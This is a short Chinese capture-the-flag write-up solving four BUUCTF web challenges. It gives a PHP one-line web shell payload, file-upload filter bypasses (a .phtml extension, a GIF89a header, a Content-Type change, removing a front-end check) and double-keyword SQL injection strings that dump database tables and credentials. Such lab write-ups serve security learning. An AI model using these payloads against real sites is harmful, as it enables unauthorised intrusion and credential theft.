BBUUCTF
一、[极客大挑战 2019]Knife
看到了一句一句话木马使用蚁剑连接
根目录下找到flag
二、[极客大挑战 2019]Upload
图片上传题先看一下前端
没啥问题
先传一下一句话木马
抓包改一下Content-Type:试试image/png
不能是php
绕过后缀的有文件格式有php,php3,php4,php5,phtml.pht
经过尝试发现phtml可以
但是不能带有<?换一个一句话木马
GIF89a
<script language="php">eval($_POST['shell']);</script>
改后缀为.phtml
上传成功用蚁剑链接
目录在upload里面
链接成功找flag
三、[ACTF2020 新生赛]Upload
查看前端
把内个return checkFile()删了或者改为ture
上传上个题的内个phtml文件直接ok
这个应该是蚁剑链接的时候要加上
链接成功找flag
四、[极客大挑战 2019]BabySQL
sql注入
试一下万能密码
不行or被过滤了
使用双写绕过
1' oorr 1=1#
给回显了
爆回显位
1' uunionnion ssleectlect 1,2,3#
爆数据库
1' uunionnion ssleectlect 1,database(),3#
爆表
1' uunionnion sselectelect 1,group_concat(table_name),3 ffromrom infoorrmation_schema.tables wwherehere table_schema='geek'#
爆列
1' uunionnion sselectelect 1,group_concat(column_name),3 ffromrom infoorrmation_schema.columns wwherehere table_schema='geek' aandnd table_name='b4bsql'#
爆字段
1' ununionion seselectlect 1,group_concat(id,username,passwoorrd),3 ffromrom b4bsql#
总结
1、木马传入时的前端和后端绕过
2、sql注入双写绕过